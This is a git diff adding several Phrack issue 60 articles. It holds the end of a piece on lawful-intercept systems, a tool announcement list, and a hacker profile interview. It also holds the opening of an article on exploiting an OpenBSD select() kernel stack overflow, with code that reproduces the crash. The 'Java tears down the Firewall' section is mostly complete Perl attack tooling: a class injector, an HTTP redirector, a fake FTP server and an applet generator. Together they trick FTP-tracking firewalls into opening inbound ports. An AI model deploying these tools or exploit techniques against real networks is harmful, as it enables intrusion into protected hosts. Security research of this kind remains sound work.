+Two RS-232C/RS-423 serial ports 
+Programmable, scalable switch with up to 4000 port time slot interchange
+
+Features: 
+
+Built in test tools for remote testing 
+Full SS7 management system 
+Alarm reporting and Error logging 
+Automatic software fault recovery 
+Automatic or manual disk backup 
+SNMP support 
+Optional support for X.25 and other collection function interfaces 
+ITU standard MML and Java based GUI support 
+Support of both circuit-switched and packet-switched networks 
+Optional support for other access function interfaces as required for
+         CALEA compliance, including: 
+ *HLR (Home Location Register) 
+ *VMS (Voice Mail System) 
+ *SMS (Short Message System) 
+ *CDPD wireless data 
+ *Authentication Center 
+ *Remote access provisioning 
+
+
+   This concludes the introduction to LAES. This being only an introduction,
+I've left out allot of details like protocol information. However, if you
+are interested it learning more about LAES I would suggest reading the TIA
+standard J-STD-025A. I hope you learned a little bit more about the
+surveillance capabilities of LEAs. If you have any questions feel free to
+contact me. Email address: see above.
+
+
+--[ 5 - Java tears down the Firewall
+
+
+Recently there has been much hype about various
+insecurities in firewalls which support tracking of FTP sessions.
+They could be tricked into thinking someone was opening an
+FTP session by using a second TCP stack for example. I would
+point you to CERT-URL for complete discussion.
+There have been other techniques discussed such as embedding
+some evil tags in HTML files which makes the browser opening
+connections a firewall could interpret as FTP session.
+
+Consider the following net:
+
+[ Company ] ---- [ firewall ] --- [ some router ] --- [ WEB ]
+
+Someone from 'Company' is browsing the web and has to
+pass his packets across some router that is not under control
+by Company but by attacker. Very common scenario no?
+
+A few tools have been compiled to circumvent such setup.
+I would even say, as soon as you enable FTP tracking you are lost.
+More than one way ends in Rome.
+
+Let me explain the small tools in short.
+
+html-redirect: Attacker installs this on some router and
+sets up redirect rule to port 8888.
+
+class-inject:  Attacker starts this with eftepe.class. html-redirect
+will redirect the HTML requests to this mini-httpd. It forces
+browser inside Company which is shielded by firewall to load
+the Java applet. This applet simulates active FTP session to
+some router and it is allowed so because security manager sees
+some router as origin of eftepe.class. Firewall will then open
+port 7350 inbound so you can connect from some router:20 to Company:7350.
+
+ftpd: Attacker must run this on some router in order to simulate FTP
+session.
+
+createclass: script to create the correct java code which is
+using apropriate IP (of some router) and port (on Company) then
+
+Attacker could also sit on WEB (i.e. phrack.org :) and embed evil
+java applets. So take care because X runs on port 6000. :-)
+
+It is really that simple, and its not even worth an own article,
+thats why you find it here as a add-on.
+
+<classinject>
+#!/usr/bin/perl -w
+
+# Puts a classfile into remote browser
+#
+
+use IO::Socket;
+
+sub usage
+{
+	print "Usage: $0 <class file>\n\n";
+	exit;
+}
+
+my $classfile = shift || usage();
+my $class;
+my $classlen = (stat($classfile))[7];
+open I, "<$classfile" or die $!;
+read I, $class, $classlen;
+close I;
+
+my $sock = new IO::Socket::INET->new(Listen => 10,
+                                     LocalPort => 8080,
+                                     Reuse => 1) or die $!;
+my $conn;
+
+for (;;) {
+	next unless $conn = $sock->accept();
+	if (fork() > 0) {
+		$conn->close();
+		next;
+	}
+	my $request = <$conn>;
+	if ($request =~ /$classfile/) {
+		my $classcontent = "HTTP/1.0 200 OK\r\n".
+		 "Server: Apache/1.3.6 (Unix)\r\n".
+		 "Content-Length: $classlen\r\n".
+		 "Content-Type: application/octet-stream\r\n\r\n".$class;
+		print $conn $classcontent;
+		print "Injected to ", $conn->peerhost(), "\n";
+	} else {
+		print $conn "<HTML>".
+		            "<APPLET CODE=\"$classfile\" WIDTH=1 HEIGHT=1>".
+		            "</APPLET></HTML>\r\n\r\n";
+	}
+	$conn->close();
+	exit(0);
+}
+</classinject>
+<createclass>
+#!/usr/bin/perl -w
+
+$ENV{"PATH"} = $ENV{"PATH"}."/usr/lib/java/bin";
+
+print "Creating apropriate Java class-file for opeing port > 1023\n";
+print "Enter IP to connect to on port 21 (e.g. '127.0.0.1'):";
+my $ip = <STDIN>; chop($ip);
+print "Enter port to open:";
+my $port = <STDIN>; chop($port);
+my $p1 = int $port/256;
+my $p2 = $port%256;
+
+open O, ">eftepe.java" or die $!;
+print O<<EOF;
+
+import java.io.*;
+import java.applet.*;
+import java.util.*;
+import java.net.*;
+
+public class eftepe extends Applet {
+
+public void init()
+{
+	try {
+		Socket s = new Socket("$ip", 21);
+		OutputStream os = s.getOutputStream();
+		BufferedReader in = new BufferedReader(new InputStreamReader(s.getInputStream()));
+		PrintWriter pw = new PrintWriter(os, true);
+		in.readLine();
+		pw.println("USER ftp\\r\\n");
+		in.readLine();
+		pw.println("PASS ftp\\r\\n");
+		in.readLine();
+		String port = new String("PORT ");
+		String me = InetAddress.getLocalHost().getHostAddress();
+		port += me.replace('.', ',');
+		port += ",$p1,$p2\\r\\n";
+		pw.println(port);
+		for(;;);
+	} catch (Exception e) {
+		e.printStackTrace();
+	}
+}
+
+}
+EOF
+
+print "Compiling into classfile...\n";
+system("javac eftepe.java");
+print "Done. Results are in eftepe.class\n";
+
+</createclass>
+
+<ftpd>
+#!/usr/bin/perl -w
+
+use IO::Socket;
+
+my $sock = new IO::Socket::INET->new(Listen => 10,
+                                     LocalPort => 21,
+                                     Reuse => 1) or die $!;
+my $conn;
+
+for (;;) {
+	$conn = $sock->accept();
+	if (fork() > 0) {
+		$conn->close();
+		next;
+	}
+	print $conn "220 ready\r\n";
+	<$conn>;  # user
+	print $conn "331 Password please\r\n";
+	<$conn>;  # pass
+	print $conn "230 Login successful\r\n";
+	<$conn>;  #port
+	print $conn "200 PORT command successful.\r\n";
+	sleep(36);
+	$conn->close();
+	exit 0;
+}
+</ftpd>
+
+<html-redirect>
+#!/usr/bin/perl -w
+
+# Simple HTTP Redirector
+#
+
+# iptables -A PREROUTING -t nat -p tcp --dport 80 -j REDIRECT --to-port 8888
+
+use IO::Socket;
+
+sub usage
+{
+	print "Usage: $0 <IP|Host>\n".
+	      "\t\tIP|Host -- IP or Host to redirect HTML reuests to\n\n";
+	exit;
+}
+
+my $r = shift || usage();
+my $redir = "HTTP/1.0 301 Moved Permanently\r\n".
+            "Location: http://$r:8080\r\n\r\n";
+
+my $sock = new IO::Socket::INET->new(Listen => 10,
+                                     LocalPort => 8888,
+                                     Reuse => 1) or die $!;
+my $conn;
+
+for (;;) {
+	next unless $conn = $sock->accept();
+	if (fork() > 0) {
+		$conn->close();
+		next;
+	}
+	my $request = <$conn>;
+	print $conn "$redir";
+	$conn->close();
+	exit(0);
+}
+</html-redirect>
+
+<testconnect>
+#!/usr/bin/perl -w
+
+use IO::Socket;
+
+sub usage
+{
+	print "Usage: $0 <Host> <Port>\r\n";
+	exit 0;
+}
+
+my $a = shift || usage();
+my $b = shift || usage();
+
+my $conn = IO::Socket::INET->new(PeerAddr => $a,
+                                 PeerPort => $b,
+                                 LocalPort => 20,
+                                 Type => SOCK_STREAM,
+                                 Proto => 'tcp') or die $!;
+
+print $conn "GOTCHA\r\n";
+$conn->close();
+</testconnect>
+
+<conntrack-start>
+#!/bin/sh
+
+# sample FTP session tracked firewall for 2.4 linux kernels
+# modprobe ip_conntrack_ftp
+
+iptables -F
+
+iptables -A INPUT -p tcp --sport 21 -m state --state ESTABLISHED -j ACCEPT
+iptables -A OUTPUT -p tcp --dport 21 -m state --state NEW,ESTABLISHED -j ACCEPT
+
+iptables -A INPUT -p tcp --sport 20 -m state --state ESTABLISHED,RELATED -j ACCEPT
+iptables -A OUTPUT -p tcp --dport 20 -m state --state ESTABLISHED -j ACCEPT
+
+#iptables -A INPUT -p tcp --syn -j LOG
+iptables -A INPUT -p tcp --syn -j DROP
+</conntrack-start>
+
+|=[ EOF ]=---------------------------------------------------------------=|
diff --git a/phrack60/4.txt b/phrack60/4.txt
new file mode 100644
index 0000000..6363fd3
--- /dev/null
+++ b/phrack60/4.txt
@@ -0,0 +1,133 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x04 of 0x10
+
+|=--------------------=[ T O O L Z   A R M O R Y ]=----------------------=|
+|=-----------------------------------------------------------------------=|
+|=---------=[ packetstorm <http://www.packetstormsecurity.org>  ]=-------=|
+
+
+This new section, Phrack Toolz Armory, is dedicated to tool annoucements.
+We will showcast selected tools of relevance to the computer underground
+which have been released recently. The tools for #60 have been selected
+in teamwork by the Packet Storm staff and Phrack staff.
+
+Drop us a mail if you develop something that you think is worth of being
+mentioned here.
+
+   1 - nmap 3.1 Statistics Patch
+   2 - thc-rut
+   3 - Openwall GNU/*/Linux (Owl) 1.0
+   4 - Stealth Kernel Patch
+   5 - Memfetch
+   6 - Lcrzoex
+   
+----[ 1 - NMAP 3.1 Statistics Patch
+
+URL     : http://packetstormsecurity.org/UNIX/nmap/nmap-3.10ALPHA4_statistics-1.diff
+Author  : vitek[at]ixsecurity.com 
+Comment : The Nmap 3.10ALFA Statistics Patch adds the -c switch which
+          guesses how much longer the scan will take, shows how many ports
+          have been tested, resent, and the ports per second rate.  Useful
+	  for scanning firewalled hosts.
+
+
+----[ 2 - thc-rut
+
+URL     : http://www.thehackerschoice.com/thc-rut
+Author  : anonymous[at]segfault.net
+Comment : RUT (aRe yoU There, pronouced as 'root') is your first knife on
+          foreign network. It gathers informations from local and remote
+          networks.
+	  
+          It offers a wide range of network discovery utilities
+          like arp lookup on an IP range, spoofed DHCP request, RARP,
+          BOOTP, ICMP-ping, ICMP address mask request, OS fingerprinting,
+          high-speed host discovery, ...
+
+          THC-RUT comes with a OS host Fingerprinter which determines the
+	  remote OS by open/closed port characteristics, banner matching
+	  and nmap fingerprinting techniques (T1, tcpoptions).
+
+          The fingerprinter has been developerd to quickly (10mins)
+          categorize hosts on a Class B network. Information sources are
+          (amoung others) SNMP replies, telnetd (NVT) negotiation options,
+          generic Banner Matching, HTTP-Server version, DCE request and
+          tcp options. It is compatible to the nmap-os-fingerprints
+          database and comes in addition to this with his own perl regex
+          capable fingerprinting database (thcrut-os-fingerprints).
+
+
+----[ 3 - Openwall GNU/*/Linux (Owl) 1.0 (Released 2002-10-13)
+
+URL     : http://www.openwall.com/Owl
+Author  : Solar Designer and other hackers.
+Comment : Openwall Linux is the Hacker's choice platform. The security
+          has been defined by people who know what they are doing. Owl
+          comes without any useless services running by default, no RPM
+          dependencies headache, full featured environment for
+          developers, a large number of usefull tools and a BSD-port-like
+          update mechanism. It's for people who prefer vi over
+          click/drag-and-drop sickness to configure the system.
+
+          Openwall GNU/*/Linux (Owl) includes a pre-built copy of John
+          the Ripper password cracker ready for use without requiring
+	  another OS (life system!) and without having to install on a
+	  hard disk (although that is supported). The CD-booted system
+	  is fully functional, you may even let it go multi-user with
+	  virtual consoles and remote shell access.
+
+          John the Ripper is a fast password cracker, currently
+	  available for many flavors of Unix (11 are officially
+          supported, not counting different architectures), DOS, Win32,
+	  and BeOS. Its primary purpose is to detect weak Unix
+	  passwords, but a number of other hash types are supported
+	  aswell.
+
+          This is probably the most secure linux distribution out there.
+
+
+----[ 4 - Stealth Kernel Patch
+
+URL     : http://packetstormsecurity.org/UNIX/patches/linux-2.2.22-stealth.diff.gz
+Author  : Sean Trifero <sean[at]innu.org>
+Comment : The Stealth Kernel Patch for Linux v2.2.22 makes the linux kernel
+	  discard the packets that many OS detection tools use to query the
+	  TCP/IP stack. Includes logging of the dropped query packets and
+	  packets with bogus flags. Does a very good job of confusing nmap
+	  and queso.
+
+
+----[ 5 - Memfetch
+
+URL     : http://packetstormsecurity.org/linux/security/memfetch.tgz
+Author  : Michal Zalewski <lcamtuf[at]ghettot.net>
+Comment : Memfetch dumps the memory of a program without disrupting its
+	  operation, either immediately or on the nearest fault condition
+	  (such as SIGSEGV). It can be used to examine suspicious or
+	  misbehaving processes on your system, verify that processes are
+          what they claim to be, and examine faulty applications using your
+	  favorite data viewer so that you are not tied to the inferior
+	  data inspection capabilities in your debugger.
+
+
+
+----[ 6 - Lcrzoex
+
+URL     : http://www.laurentconstantin.com/en/lcrzoex/
+          http://www.laurentconstantin.com/en/rzobox/ (front end)
+Author  : Laurent Constantin <laurent.constantin@aql.fr>
+Comment : Lcrzoex contains over 400 tools to test an Ethernet/IP
+          network. It runs under Linux, Windows, FreeBSD, OpenBSD and
+	  Solaris. Features:
+
+		  - sniff/spoof/replay
+		  - syslog/ftp/dns/http/telnet clients
+		  - ping/traceroute
+		  - web spider
+		  - tcp/web backdoor
+		  - data conversion
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack60/5.txt b/phrack60/5.txt
new file mode 100644
index 0000000..26983f6
--- /dev/null
+++ b/phrack60/5.txt
@@ -0,0 +1,245 @@
+phrack.org:~# cat .bash_history
+
+                            ==Phrack Inc.==
+
+              Volume 0x0b, Issue 0x3c, Phile #0x05 of 0x10
+
+|=--------------=[ P R O P H I L E   O N   H O R I Z O N ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=------------------------=[ Phrack Staff ]=-----------------------------=|
+
+
+|=---=[ Specification
+
+                  Handle: horizon
+                     AKA: humble, john
+           Handle origin: It sounded neat.
+               catch him: I'm very easy to find.
+        Age of your body: mid 20s
+             Produced in: USA
+         Height & Weight: 5'11" ~165 lbs.
+                    Urlz: Nope
+               Computers: A couple of decent x86 boxes and a lot of
+                          older stuff..
+               Member of: CostCo
+                Projects: Currently, stuff for work, and a few personal
+                          things that really aren't that interesting.
+
+|=---=[ Favorite things
+
+          Women: Creativity, intelligence, a sense of style.
+           Cars: German
+          Foods: Indian, Thai, Korean, Greek, Japanese, Lean Pockets
+        Alcohol: Helles, Redbull & Vodka
+          Music: Screeching Weasel, Fugazi, Stretch Armstrong,
+                 Bad Religion, some electronic
+         Movies: Big Lebowski, Office Space, Austin Powers, Memento, Pi
+Books & Authors: Sigh.. I wish I read more these days.
+           Urls: Can't think of any...
+         I like: Engaging conversation. Sincerity and conviction.
+                 Solving difficult problems. Mr. Show. Gummi Bears.
+      I dislike: Unwarranted arrogance. Unwarranted Gummi Bears.
+
+|=---=[ Life in 3 sentences
+
+I've never been normal. I've always felt a sense of purpose. I've tried
+to be generous.
+
+|=---=[ Hacker Life
+
+PHRACKSTAFF: You have found quite a lot of bugs in the past and developed
+             exploit code for them. Some vulnerabilities required new
+             creative exploitation concepts which were not known at that
+             time. What drives you into Challenging the exploitation of
+             complicated bugs and what methods do you use?  
+
+Well, my motivations have definitely changed over time. I can come
+up with several ancillary reasons that have driven me at different times
+during my life, and they include both the selfish and the altruistic. But,
+I think it really comes down to a compulsion to figure all this stuff
+out.
+
+As far as methods, I try to be somewhat systematic in my approach. I
+budget a good portion of time for just reading through the program,
+trying to get a feel for its architecture and the mindset and techniques
+of its authors. This also seems to help prime my subconscious.
+
+I like to start at the lower layers of a program or system and look for
+any kind of potential unexpected behavior that could percolate upwards. I
+will document each function and brainstorm any potential problems I see
+with it. I will occasionally take a break from documentation, and do the
+considerably more fun work of tracing back some of my theories to see if
+they pan out.
+
+As far as writing exploits, I generally just try to reduce or eliminate
+the number of things that need to be guessed.
+
+|=---=[ Passions | What makes you tick
+
+I'm definitely obsessed with computers. One of my original goals in
+learning to program as a kid was to develop games, so I've always been
+kind of passively interested in that. I'm also interested in artificial
+intelligence.
+
+I've been doing Wing Chun kung fu for about two years now, and I find
+that to be really rewarding.
+
+I spend a decent bit of my time thinking. I like to read lay-person
+oriented overviews of various academic disciplines. I'd really like to
+learn more about biology and neuroscience.
+
+|=---=[ Which research have you done or which one gave you the most fun?
+
+I think I've had the most fun when collaborating with others.
+
+|=---=[ Memorable Experiences
+
+Hanging out with sygma, saad, wordsmith, shegget, and all my old irc
+friends. Getting into trouble with colonwq. Long, not entirely coherent,
+chats with rc.local. :>
+
+The weekend drinking/hacking/coding sessions at neon's place.
+boilermakers. Romania. Coding with xaphan. Almost getting fired from my
+university job for hacking Microsoft, and then getting let off the hook
+when one of their security officers called my boss. Helping joey__ write
+his first exploit, and then not understanding how it worked when he had
+finished. Working on various stuff with JoC, cham, module, so1o, zorkeres,
+binf, and the rest of the r9 guys.
+
+Hanging out with Vacuum and RFP before leaving the US.
+
+The time I spent living in Germany. Working with plaguez and Thomas, two
+absurdly brilliant guys. Living with Howard and Sondee.. eating at the
+Citta. CCC Camp - Meeting TESO, THC, and many others. linux deathmatch.
+
+Watching people like duke and scut (and many others) get really good, and
+hoping that I somehow helped.
+
+Accidentally crashing gatekeeper.
+
+Hanging out in the adm channel. The always interesting discussions with
+str and anti. Racing with K2 to write exploits as Sun advisories came
+out.
+
+The Firewall-1 speech with Dug and Thomas.
+
+Finally getting my degree.
+
+My european tour with dice. HAL. Meeting silvio. Getting smashed in the
+basement of a bar in Poland with the LSD guys. Chilling with Scrippie and
+Dvorvak and the members of a Dutch death metal band.
+
+Going to a rave in Miami with JJ and ending up in the keys the day before
+a hurricane.
+
+Watching my little brothers grow up.
+
+Tag team coding/auditing with dice.
+
+Working for cool people - Mike, Jim, Pat.
+
+German/reversing lessons from Halvar.
+
+sms's from srpnsrt.
+
+Defcon - meeting digit, cheez, charise, zip, gobbles, i1l, cain, arakis,
+caddis, ryan, riley, and so many others.
+
+The fun times I've had in Chicago. Greg's couch. OFP with Paul and
+Sergey. The bachelor party with monti and MJ. Meeting the esteemed Sarlo.
+
+|=---=[ What's your architecture of choice? OS of choice?
+
+I tend to use what I'm comfortable with or whatever seems appropriate at
+the moment. The three machines that I use most of the time are currently
+running XP, Linux, and OpenBSD.
+
+|=---=[ Quotes
+
+"Jesus Christ John McDonald!"
+
+"odd"
+
+"So, basically, what you are saying is that we should try to find the
+reactors."
+
+"Hey, I just work here..."
+
+|=---=[ Open Interview
+
+Q: When did you start playing with computers?
+
+I got a c64 when I was 6.
+
+Q: When did you had your first contact to the 'scene'?
+
+1997 or so.
+
+Q: When did you for your first time connect to the Internet?
+
+1993. I had a part time job in high school programming for a satellite
+research center that had Internet access. From what I recall, I mainly
+played around on usenet and ftp sites.
+
+Q: Let's talk a little bit about free research and Copyright. What's your
+   opinion about "Copyright on exploits"?
+
+Well, I'm not a lawyer, and I haven't really looked into it. I think that
+people should be entitled to do what they want with their work, and that
+legal protections are there for a reason. However, I've got no idea what
+copyrighting an exploit will actually afford you legally.
+
+Q: If you could turn the clock backward, what would you do different
+   in your young life ?
+
+That's a tough one. The Internet has suffered a fair bit for the sake of
+my ego. I think I would have handled certain things with more discretion
+if I'd had a little more perspective.
+
+|=---=[ One word comments
+
+Give a one word comment to the following topics:
+
+Digital Millennium Copyright Act (DMCA): oceanliner
+KIMBLE (the wannabe-hacker)            : hoogedlyboogedly
+ADM                                    : fun
+NAI                                    : work
+THE SCENE                              : which?
+Companies buying exploits from hackers : dunno
+IRC                                    : idle
+CERT                                   : maligned
+Full Disclosure Policy                 : careful
+
+|=---=[ Would you work for the government/military? Why or why not?
+
+As much as it suprises me to say it, I don't really have an ideological
+opposition to working for my government. I think the combination of
+getting a little bit older, spending some time living abroad, and the
+recent events in my country has made me more appreciative of certain
+things. I think it is safe to say I would do it if I believed I was doing
+something positive and I thought it was necessary. Otherwise, I'd avoid
+it because it would just make life more complicated.
+
+|=---=[ Please tell our audience a worst case scenario into what the scene
+        might turn into.
+
+I guess I could prognosticate about it becoming factionalized, petty,
+cruel, insecure, and paranoid, but who would I be kidding?
+
+|=---=[ And if everything works out fine? What's the best case scenario
+        you can imagine?
+
+As long as there is a place for new people who show promise, I think things
+will be cool.
+
+|=---=[ Any suggestions/comments/flames to the scene and/or specific people?
+
+Think for yourself.
+
+|=---=[ Shoutouts & Greetings
+
+Hi everyone :>
+
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
diff --git a/phrack60/6.txt b/phrack60/6.txt
new file mode 100644
index 0000000..e36678c
--- /dev/null
+++ b/phrack60/6.txt
@@ -0,0 +1,1951 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3c, Phile #0x06 of 0x10
+
+|=----------=[ Smashing The Kernel Stack For Fun And Profit ]=----------=|
+|=----------------------------------------------------------------------=|
+|=--------------=[ Sinan "noir" Eren <noir@olympos.org> ]=--------------=|
+
+
+DISCLAIMER:
+This article presented here is bound to no organization or company.  It is
+the author's contrubition to the hacker community at large.  The research
+and development in this article is done by the author with NO SUPPORT from
+a commercial organization or company. No organization or company should be
+held responsible or credited for this article other than the author
+himself. 
+
+
+--[ Contents
+
+	1 - Introduction
+
+	2 - The vulnerability: OpenBSD select() syscall overflow
+
+	3 - Obstacles encountered in exploitation
+	  3.1 - Overcoming the large copyin() problem
+	    3.1.1 - mprotect() 4 life!
+	  3.2 - Payload storage problem
+	  3.3 - Return to user land problem
+
+	4 - Crafting the exploit
+	  4.1 - Breakpoints & distance Calculation
+	  4.2 - Return address overwrite & execution redirection
+
+	5 - How to gather offsets & symbol addresses
+	  5.1 - sysctl() syscall
+	  5.2 - sidt technique & _kernel_text search
+	  5.3 - _db_lookup() technique	    
+	  5.4 - /usr/bin/nm, kvm_open(), nlist()
+	  5.5 - %ebp fixup	
+
+	6 - Payload/shellcode creation
+	  6.1 - What to achieve
+	  6.2 - The payload
+	    6.2.1 - p_cred & u_cred
+	    6.2.2 - chroot breaking
+	    6.2.3 - securelevel
+	  6.3 - Get root & escape jail
+
+	7 - Conclusions
+
+	8 - Greetings
+
+	9 - References
+
+	10 - Code
+
+
+--[ 1 - Introduction
+
+
+This article is about recent exposures of many kernel level vulnerabilities
+and advances in their exploitation which leads to trusted (oops safe) and
+robust exploits.
+
+We will focus on 2 recent vulnerabilities in the OpenBSD kernel as our case
+studies. Out of the these we will mainly concentrate on exploitation of the
+select() system call buffer overflow. The setitimer() arbitrary memory
+overwrite vulnerability will be explained in the code section of this
+article (as inline comments, so as not to repeat what we have already
+covered whilst exploring the select() buffer overflow).
+
+This paper should not be viewed as an exploit construction tutorial, my
+goal is, rather, to explore and demonstrate generic ways to exploit stack
+overflows and signed/unsigned vulnerabilities in kernel space.
+
+Case studies will be used to demonstrate these techniques, and reusable
+*BSD "kernel level shellcodes" -- with many cool features! -- will be
+presented.
+
+There has been related work done by [ESA] and [LSD-PL], which may
+complement this article.
+
+
+--[ 2 - The Vulnerability: OpenBSD select() syscall overflow
+
+
+sys_select(p, v, retval)
+        register struct proc *p;
+        void *v;
+        register_t *retval;
+{
+        register struct sys_select_args /* {
+                syscallarg(int) nd;
+                syscallarg(fd_set *) in;
+                syscallarg(fd_set *) ou;
+                syscallarg(fd_set *) ex;
+                syscallarg(struct timeval *) tv;
+        } */ *uap = v;
+        fd_set bits[6], *pibits[3], *pobits[3];
+        struct timeval atv;
+        int s, ncoll, error = 0, timo;
+        u_int ni;
+
+[1]     if (SCARG(uap, nd) > p->p_fd->fd_nfiles) {
+                /* forgiving; slightly wrong */
+                SCARG(uap, nd) = p->p_fd->fd_nfiles;
+        }
+[2]     ni = howmany(SCARG(uap, nd), NFDBITS) * sizeof(fd_mask);
+[3]     if (SCARG(uap, nd) > FD_SETSIZE) {
+
+	...
+
+	}
+	...
+#define getbits(name, x) \
+[4]   if (SCARG(uap, name) && (error = copyin((caddr_t)SCARG(uap, name), \
+            (caddr_t)pibits[x], ni))) \
+                goto done;
+[5]     getbits(in, 0);
+        getbits(ou, 1);
+        getbits(ex, 2);
+#undef  getbits
+
+	...
+
+To make some sense out of the code above we need to decipher the SCARG
+macro, which is extensively used in the OpenBSD kernel syscall handling
+routines.
+
+Basically, SCARG() is a macro that retrieves the members of the 'struct
+sys_XXX_args' structures.
+
+sys/systm.h:114
+...
+#if     BYTE_ORDER == BIG_ENDIAN
+#define SCARG(p, k)     ((p)->k.be.datum)       /* get arg from args 
+pointer */
+#elif   BYTE_ORDER == LITTLE_ENDIAN
+#define SCARG(p, k)     ((p)->k.le.datum)       /* get arg from args 
+pointer */
+
+sys/syscallarg.h:14
+...
+#define syscallarg(x)                                                   \
+        union {                                                         \
+                register_t pad;                                         \
+                struct { x datum; } le;                                 \
+                struct {                                                \
+                        int8_t pad[ (sizeof (register_t) < sizeof (x))  \
+                                ? 0                                     \
+                                : sizeof (register_t) - sizeof (x)];    \
+                        x datum;                                        \
+                } be;                                                   \
+        }
+
+
+Access to structure members is performed via SCARG() in order to preserve
+alignment along CPU register size boundaries, so that memory accesses will
+be faster and more efficient.
+
+In order to make use of the SCARG() macro, the declarations need to be done
+as follows (example for select() syscall arguments):
+
+sys/syscallarg.h:404
+...
+struct sys_select_args {
+[6]     syscallarg(int) nd;
+        syscallarg(fd_set *) in;
+        syscallarg(fd_set *) ou;
+        syscallarg(fd_set *) ex;
+        syscallarg(struct timeval *) tv;
+};
+
+The vulnerability can be described as an insufficient check on the 'nd'
+argument [6], which is used as the length parameter for userland to kernel
+land copy operations.
+
+Whilst there is a check [1] on the 'nd' argument (nd represents the highest
+numbered descriptor plus one, in any of the fd_sets), which is checked
+against the p->p_fd->fd_nfiles (the number of open descriptors that the
+process is holding), this check is inadequate -- 'nd' is declared as signed
+[6], so it can be negative, and therefore will pass the greater-than check
+[1].
+
+Then 'nd' is put through a macro [2], in order to calculate an unsigned
+integer, 'ni', which will eventually be used as the the length argument for
+the copyin operation.
+
+howmany() [2] is defined as follows (sys/param.h line 175):
+
+#define howmany(x, y)   (((x)+((y)-1))/(y))
+
+Expansion of line [2] will look like as follows:
+
+sys/types.h:157, 169
+#define NBBY    8               /* number of bits in a byte */
+
+typedef int32_t fd_mask;
+#define NFDBITS (sizeof(fd_mask) * NBBY)        /* bits per mask */
+...
+ni = ((nd + (NFDBITS-1)) / NFDBITS)  * sizeof(fd_mask);
+ni = ((nd + (32 - 1)) / 32) * 4
+
+Calculation of 'ni' is followed by another check on the 'nd' argument [3].
+This check is also passed, since OpenBSD developers consistently forget
+about the signedness checks on the 'nd' argument. Check [3] was done to see
+if the space allocated on the stack is sufficient for the following copyin
+operations, and, if not, then sufficient heap space will be allocated.
+
+Given the inadequacy of the signed check, we'll pass check [3] (>
+FD_SETSIZE), and will continue using stack space. This will make our life
+much easier, given that stack overflows are much more trivially exploited
+than heap overflows. (Hopefully, I'll write a follow-up paper that will
+demonstrate kernel-land heap overflows in the future).
+
+Finally, the getbits() [4,5] macro is defined and called in order to
+retrieve user supplied fd_sets (readfds, writefds, exceptfds -- these
+arrays contain the descriptors to be tested for 'ready for reading', ready
+for writing' or 'have an exceptional condition pending').
+
+For exploitation purposes we don't really care about the layout of the
+fd_sets -- they can be treated as any simple char buffer aiming to overflow
+its boundaries and overwrite the saved ebp and saved eip.
+
+With this simple test code, we can reproduce the overflow:
+
+#include <stdio.h>
+#include <sys/types.h>
+
+int
+main(void)
+{
+	char *buf;
+	buf = (char *) malloc(1024);
+	memset(buf, 0x41, 1024);
+	select(0x80000000, (fd_set *) buf, NULL, NULL, NULL);
+}
+ 
+What happens is; system call number 93 (SYS_select) is dispatched to
+handler sys_select() by the syscall() function, with all user land supplied
+arguments bundled into a sys_select_args structure.
+
+'nd', being 0x80000000 (the smallest negative number for signed 32bit) has
+gone through the size check [1] and, later, the howmany() macro [2]
+calculates unsigned integer 'ni' as 0x10000000. The getbits() macro [5] is
+then called with the address of buf (user land, heap) which expands to the
+copyin(buf, kernel_stack, 0x10000000) operation.
+
+copyin() starts to copy the userland buffer to the kernel stack, a long at
+a time (0x10000000/4 times). However, this copy operation won't ever fully
+succeed, as the kernel will run out of per-process stack trying to copy
+such a huge buffer from userland -- and will crash on an out of bounds
+write operation.
+
+
+--[ 3 - Obstacles encountered in exploitation
+
+
+     - copyin(uaddr, kaddr, big_number) problem
+
+First and the most obvious problem is to take control of the size argument
+'ni' passed to the copyin operation, since this number is derived from the
+user supplied 'nd' argument which, must be negative, we'll never be able to
+construct a reasonably "big" number. Actually the "smallest" positive
+number we can construct is 0x10000000. As we have already find out that,
+this number will cause us to hit the end of kernel stack and kernel will
+panic. This is our first obstacle and we'll overcome it by exploring how
+copyin() works in the following section.
+
+      - payload storage problem
+
+This is a typical problem for every type of exploit (user or kernel land).
+Determining where the most appropriate place is to store the
+payload/shellcode.  This problem is rather simple to overcome in kernel
+land exploits and we'll talk about the proper solution. 
+
+      - clean return to user land problem
+
+Another problem arises after we overwrite the saved return address and gain
+control, at that point we can be real imaginative on the payload, but we'll
+run into the trouble of how to return back to user land and be able to
+enjoy our newly altered kernel space! 
+
+
+--[ 3.1 - Overcoming The Large copyin() Problem
+
+
+To be able to solve this problem, we need to read through the copyin() and
+trap() functions and understand their internals.
+
+We shall start by understanding copyin() user to kernel copy primitive, my
+comments will be inlined:
+
+sys/arch/i386/i386/locore.s:955
+
+ENTRY(copyin)
+        pushl   %esi
+        pushl   %edi
+
+Save %esi, %edi .
+
+        movl    _C_LABEL(curpcb),%eax
+
+Move the current process control block address (_curpcb) into %eax .
+_C_LABEL() is a simple macro that will add an underscore sign to the
+beginning of the symbol name. See sys/arch/i386/include/asm.h:66
+
+The process control block is a per-process kernel structure that holds the
+current execution state of a process and differs based on machine
+architecture. It consists of: stack pointer, program counter, general-
+purpose registers, memory management registers and some other architecture
+depended members such as per process LDT's (i386) and so on. The *BSD
+kernel extends the PCB with software related entries, such as the
+"copyin/out fault recovery" handler (pcb_onfault). Each process control
+block is stored and referenced through the user structure. See
+sys/user.h:61 and [4.4 BSD].
+
+[1]    pushl   $0
+
+Push a ZERO on the stack; this will make sense at the epilog or the
+_copy_fault function, which has the matching 'popl' instruction.
+
+[2]    movl    $_C_LABEL(copy_fault),PCB_ONFAULT(%eax)
+
+Move _copy_fault's entry address into the process control block's
+pcb_onfault member. This simply installs a special fault handler for
+'protection', 'segment not present' and 'alignment' faults.  copyin()
+installs its own fault handler, _copy_fault, we'll get back to this when
+exploring the trap() code, since processor faults are handled there.
+
+        movl    16(%esp),%esi
+        movl    20(%esp),%edi
+        movl    24(%esp),%eax
+
+Move the incoming first, second and third arguments to %esi, %edi, %eax
+respectively. %esi being the user land buffer, %edi the destination kernel
+buffer and %eax the size.
+
+    /*
+     * We check that the end of the destination buffer is not past the end
+     * of the user's address space.  If it's not, then we only need to
+     * check that each page is readable, and the CPU will do that for us.
+     */
+        movl    %esi,%edx
